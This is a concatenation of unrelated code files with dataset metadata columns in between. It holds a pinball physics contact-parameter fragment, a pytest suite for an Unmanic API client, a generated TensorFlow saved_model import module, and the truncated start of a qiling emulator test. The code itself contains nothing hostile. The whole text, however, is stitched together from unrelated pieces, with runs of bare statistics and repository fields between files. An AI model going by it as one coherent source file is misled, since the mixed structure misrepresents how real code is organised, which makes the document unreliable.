worldInfo.defaultContactParams.surface.bounce_vel = 0.1
i = getCategoryIndex(FLIPPER_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 30.0
contactParams.surface.bounce = 0.05
contactParams.surface.bounce_vel = 0.1
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(WALL_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 0.1
contactParams.surface.bounce = 0.1
contactParams.surface.bounce_vel = 0.1
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(GROUND_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 0.1
contactParams.surface.bounce = 0
contactParams.surface.bounce_vel = 0.1
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(RUBBER_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 20.0
contactParams.surface.bounce = 1.0
contactParams.surface.bounce_vel = 0.01
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(BUMPER_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 20.0
contactParams.surface.bounce = 1.0
contactParams.surface.bounce_vel = 0.01
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(SLINGSHOT_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 30.0
contactParams.surface.bounce = 0.05
contactParams.surface.bounce_vel = 0.1
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(TRIGGER_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 0.1
contactParams.surface.bounce = 0.1
contactParams.surface.bounce_vel = 0.1
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
i = getCategoryIndex(BUMPER_TRIGGER_CATEGORY)
contactParams = sgode.pyode.dContactArrayGet(worldInfo.contactParams, i)
contactParams.surface.mode = sgode.pyode.dContactBounce
contactParams.surface.mu = 20.0
contactParams.surface.bounce = 1.0
contactParams.surface.bounce_vel = 0.01
sgode.pyode.dContactArraySet(worldInfo.contactParams, i, contactParams)
| 48.097222
| 76
| 0.77043
| 373
| 3,463
| 7.104558
| 0.112601
| 0.241509
| 0.138868
| 0.217358
| 0.872075
| 0.852075
| 0.852075
| 0.852075
| 0.852075
| 0.852075
| 0
| 0.02317
| 0.140052
| 3,463
| 72
| 77
| 48.097222
| 0.866689
| 0
| 0
| 0.691176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.029412
| 0
| 0.088235
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f10423a54f3839319caed71f909b13b715b7dfff
| 30,247
|
py
|
Python
|
tests/test_interface.py
|
JeffResc/Unmanic-API
|
a68afccd90ac6fff7ad7eb4abae98fa1e086f239
|
[
"MIT"
] | 1
|
2022-03-05T11:52:05.000Z
|
2022-03-05T11:52:05.000Z
|
tests/test_interface.py
|
JeffResc/Unmanic-API
|
a68afccd90ac6fff7ad7eb4abae98fa1e086f239
|
[
"MIT"
] | null | null | null |
tests/test_interface.py
|
JeffResc/Unmanic-API
|
a68afccd90ac6fff7ad7eb4abae98fa1e086f239
|
[
"MIT"
] | null | null | null |
"""Tests for Unmanic Interface."""
from typing import List
import pytest
import unmanic_api.models as models
from aiohttp import ClientSession
from unmanic_api import Unmanic, UnmanicError
from . import load_fixture
HOST = "192.168.1.99"
PORT = 8888
MATCH_HOST = f"{HOST}:{PORT}"
@pytest.mark.asyncio
async def test_loop():
"""Test loop usage is handled correctly."""
async with Unmanic(HOST, PORT) as unmanic:
assert isinstance(unmanic, Unmanic)
@pytest.mark.asyncio
async def test_get_installation_name(aresponses):
"""Test get_installation_name() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("settings.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_installation_name()
assert response
assert response == "Unmanic"
@pytest.mark.asyncio
async def test_get_installation_name_empty_json(aresponses):
"""Test get_installation_name() method is handled correctly given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_installation_name()
@pytest.mark.asyncio
async def test_get_installation_name_empty_string(aresponses):
"""Test get_installation_name() method is handled correctly given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_installation_name()
@pytest.mark.asyncio
async def test_get_pending_tasks(aresponses):
"""Test get_pending_tasks() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/pending/tasks",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("queue.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_pending_tasks()
assert response
assert isinstance(response, models.TaskQueue)
assert response.results[0]
assert isinstance(response.results[0], models.PendingTask)
@pytest.mark.asyncio
async def test_get_pending_tasks_empty_json(aresponses):
"""Test get_pending_tasks() method is handled correctly given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/pending/tasks",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_pending_tasks()
@pytest.mark.asyncio
async def test_get_pending_tasks_empty_string(aresponses):
"""Test get_pending_tasks() method is handled correctly given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/pending/tasks",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_pending_tasks()
@pytest.mark.asyncio
async def test_get_task_history(aresponses):
"""Test get_task_history() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/history/tasks",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("history.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_task_history()
assert response
assert isinstance(response, models.TaskHistory)
assert response.results[0]
assert isinstance(response.results[0], models.CompletedTask)
@pytest.mark.asyncio
async def test_get_task_history_empty_json(aresponses):
"""Test get_task_history() method is handled correctly given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/history/tasks",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_task_history()
@pytest.mark.asyncio
async def test_get_task_history_empty_string(aresponses):
"""Test get_task_history() method is handled correctly given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/history/tasks",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_task_history()
@pytest.mark.asyncio
async def test_get_settings(aresponses):
"""Test get_settings() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("settings.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_settings()
assert response
assert isinstance(response, models.Settings)
@pytest.mark.asyncio
async def test_get_settings_empty_json(aresponses):
"""Test get_settings() method is handled correctly given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_settings()
@pytest.mark.asyncio
async def test_get_settings_empty_string(aresponses):
"""Test get_settings() method is handled correctly given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_settings()
@pytest.mark.asyncio
async def test_get_version(aresponses):
"""Test get_version() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/version/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("version.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_version()
assert response
assert response == "0.1.4~655b18b"
@pytest.mark.asyncio
async def test_get_version_empty_json(aresponses):
"""Test get_version() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/version/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
assert await unmanic.get_version()
@pytest.mark.asyncio
async def test_get_version_empty_string(aresponses):
"""Test get_version() method is handled correctly when given empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/version/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
assert await unmanic.get_version()
@pytest.mark.asyncio
async def test_get_workers_count(aresponses):
"""Test get_worker_count() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("settings.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_workers_count()
assert response
assert response == 4
@pytest.mark.asyncio
async def test_get_workers_count_empty_json(aresponses):
"""Test get_worker_count() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_workers_count()
@pytest.mark.asyncio
async def test_get_workers_count_empty_string(aresponses):
"""Test get_worker_count() method is handled correctly when given empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/read",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_workers_count()
@pytest.mark.asyncio
async def test_get_workers_status(aresponses):
"""Test get_workers_status() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/status",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text=load_fixture("workers.json"),
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.get_workers_status()
assert response
assert isinstance(response, List)
assert response[0]
assert isinstance(response[0], models.Worker)
@pytest.mark.asyncio
async def test_get_workers_status_empty_json(aresponses):
"""Test get_workers_status() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/status",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_workers_status()
@pytest.mark.asyncio
async def test_get_workers_status_empty_string(aresponses):
"""Test get_workers_status() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/status",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.get_workers_status()
@pytest.mark.asyncio
async def test_pause_all_workers(aresponses):
"""Test pause_all_workers() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/pause/all",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.pause_all_workers()
assert response
assert response == True
@pytest.mark.asyncio
async def test_pause_all_workers_empty_json(aresponses):
"""Test pause_all_workers() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/pause/all",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.pause_all_workers()
@pytest.mark.asyncio
async def test_pause_all_workers_empty_string(aresponses):
"""Test pause_all_workers() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/pause/all",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.pause_all_workers()
@pytest.mark.asyncio
async def test_pause_worker(aresponses):
"""Test pause_worker() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/pause",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.pause_worker("W0")
assert response
assert response == True
@pytest.mark.asyncio
async def test_pause_worker_empty_json(aresponses):
"""Test pause_worker() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/pause",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{}',
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.pause_worker("W0")
@pytest.mark.asyncio
async def test_pause_worker_empty_string(aresponses):
"""Test pause_worker() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/pause",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.pause_worker("W0")
@pytest.mark.asyncio
async def test_resume_all_workers(aresponses):
"""Test resume_all_workers() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/resume/all",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.resume_all_workers()
assert response
assert response == True
@pytest.mark.asyncio
async def test_resume_all_workers_empty_json(aresponses):
"""Test resume_all_workers() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/resume/all",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.resume_all_workers()
@pytest.mark.asyncio
async def test_resume_all_workers_empty_string(aresponses):
"""Test resume_all_workers() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/resume/all",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.resume_all_workers()
@pytest.mark.asyncio
async def test_resume_worker(aresponses):
"""Test resume_worker() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/resume",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.resume_worker("W0")
assert response
assert response == True
@pytest.mark.asyncio
async def test_resume_worker_empty_json(aresponses):
"""Test resume_worker() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/resume",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.resume_worker("W0")
@pytest.mark.asyncio
async def test_resume_worker_empty_string(aresponses):
"""Test resume_worker() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/resume",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.resume_worker("W0")
@pytest.mark.asyncio
async def test_set_settings(aresponses):
"""Test set_settings() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/write",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
body_pattern='{"settings": {"debugging": true}}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.set_settings({"debugging": True})
assert response
assert response == True
@pytest.mark.asyncio
async def test_set_settings_empty_json(aresponses):
"""Test set_settings() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/write",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
body_pattern='{"settings": {"debugging": true}}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.set_settings({"debugging": True})
@pytest.mark.asyncio
async def test_set_settings_empty_string(aresponses):
"""Test set_settings() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/write",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
body_pattern='{"settings": {"debugging": true}}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.set_settings({"debugging": True})
@pytest.mark.asyncio
async def test_set_workers_count(aresponses):
"""Test set_workers_count() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/write",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
body_pattern='{"settings": {"number_of_workers": 4}}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.set_workers_count(4)
assert response
assert response == True
@pytest.mark.asyncio
async def test_set_workers_count_empty_json(aresponses):
"""Test set_workers_count() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/write",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True,
body_pattern='{"settings": {"number_of_workers": 4}}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.set_workers_count(4)
@pytest.mark.asyncio
async def test_set_workers_count_empty_string(aresponses):
"""Test set_workers_count() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/settings/write",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
body_pattern='{"settings": {"number_of_workers": 4}}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.set_workers_count(4)
@pytest.mark.asyncio
async def test_terminate_worker(aresponses):
"""Test terminate_worker() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/terminate",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.terminate_worker("W0")
assert response
assert response == True
@pytest.mark.asyncio
async def test_terminate_worker_empty_json(aresponses):
"""Test terminate_worker() method is handled correctly when given empty json."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/terminate",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{}',
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.terminate_worker("W0")
@pytest.mark.asyncio
async def test_terminate_worker_empty_string(aresponses):
"""Test terminate_worker() method is handled correctly when given an empty string."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v2/workers/worker/terminate",
"POST",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True,
body_pattern='{"worker_id": "W0"}',
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.terminate_worker("W0")
@pytest.mark.asyncio
async def test_trigger_library_scan(aresponses):
"""Test trigger_library_scan() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v1/pending/rescan",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text='{ "success": true }',
),
match_querystring=True
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
response = await unmanic.trigger_library_scan()
assert response
assert response == True
@pytest.mark.asyncio
async def test_trigger_library_scan_empty_json(aresponses):
"""Test trigger_library_scan() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v1/pending/rescan",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="{}",
),
match_querystring=True
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.trigger_library_scan()
@pytest.mark.asyncio
async def test_trigger_library_scan_empty_string(aresponses):
"""Test trigger_library_scan() method is handled correctly."""
aresponses.add(
MATCH_HOST,
"/unmanic/api/v1/pending/rescan",
"GET",
aresponses.Response(
status=200,
headers={"Content-Type": "application/json"},
text="",
),
match_querystring=True
)
async with ClientSession() as session:
unmanic = Unmanic(HOST, PORT, session=session)
with pytest.raises(UnmanicError):
await unmanic.trigger_library_scan()
| 31.022564
| 91
| 0.617284
| 3,170
| 30,247
| 5.747003
| 0.032808
| 0.025799
| 0.042925
| 0.055549
| 0.969755
| 0.957954
| 0.945054
| 0.944999
| 0.935503
| 0.908223
| 0
| 0.010463
| 0.266936
| 30,247
| 975
| 92
| 31.022564
| 0.811167
| 0.000926
| 0
| 0.837838
| 0
| 0
| 0.134556
| 0.056585
| 0
| 0
| 0
| 0
| 0.047912
| 1
| 0
| false
| 0
| 0.007371
| 0
| 0.007371
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f150464b584b3716137f643673f1ec0a46a1800e
| 399
|
py
|
Python
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/saved_model/tag_constants/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 3
|
2019-04-01T11:03:04.000Z
|
2019-12-31T02:17:15.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/saved_model/tag_constants/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-04-15T18:46:45.000Z
|
2021-04-15T18:46:45.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/saved_model/tag_constants/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-09-23T13:43:07.000Z
|
2021-09-23T13:43:07.000Z
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.saved_model.tag_constants import GPU
from tensorflow.python.saved_model.tag_constants import SERVING
from tensorflow.python.saved_model.tag_constants import TPU
from tensorflow.python.saved_model.tag_constants import TRAINING
| 44.333333
| 73
| 0.847118
| 59
| 399
| 5.559322
| 0.491525
| 0.170732
| 0.243902
| 0.304878
| 0.585366
| 0.585366
| 0.585366
| 0.585366
| 0
| 0
| 0
| 0
| 0.082707
| 399
| 9
| 74
| 44.333333
| 0.896175
| 0.358396
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
74e9b4bc9d331cdc23a714bd3d8200ea88d83015
| 9,183
|
py
|
Python
|
qiling/tests/test_elf_multithread.py
|
mrTavas/owasp-fstm-auto
|
6e9ff36e46d885701c7419db3eca15f12063a7f3
|
[
"CC0-1.0"
] | 2
|
2021-05-05T12:03:01.000Z
|
2021-06-04T14:27:15.000Z
|
qiling/tests/test_elf_multithread.py
|
mrTavas/owasp-fstm-auto
|
6e9ff36e46d885701c7419db3eca15f12063a7f3
|
[
"CC0-1.0"
] | null | null | null |
qiling/tests/test_elf_multithread.py
|
mrTavas/owasp-fstm-auto
|
6e9ff36e46d885701c7419db3eca15f12063a7f3
|
[
"CC0-1.0"
] | 2
|
2021-05-05T12:03:09.000Z
|
2021-06-04T14:27:21.000Z
|
#!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#
import sys, unittest, subprocess, string, random, os
from unicorn import UcError, UC_ERR_READ_UNMAPPED, UC_ERR_FETCH_UNMAPPED
sys.path.append("..")
from qiling import *
from qiling.const import *
from qiling.exception import *
from qiling.os.posix import syscall
from qiling.os.mapper import QlFsMappedObject
from qiling.os.posix.stat import Fstat
class ELFTest(unittest.TestCase):
def test_elf_linux_execve_x8664(self):
ql = Qiling(["../examples/rootfs/x8664_linux/bin/posix_syscall_execve"], "../examples/rootfs/x8664_linux", verbose=QL_VERBOSE.DEBUG)
ql.run()
for key, value in ql.loader.env.items():
QL_TEST=value
self.assertEqual("TEST_QUERY", QL_TEST)
self.assertEqual("child", ql.loader.argv[0])
del QL_TEST
del ql
def test_multithread_elf_linux_x86(self):
def check_write(ql, write_fd, write_buf, write_count, *args, **kw):
nonlocal buf_out
try:
buf = ql.mem.read(write_buf, write_count)
buf = buf.decode()
buf_out = buf
except:
pass
buf_out = None
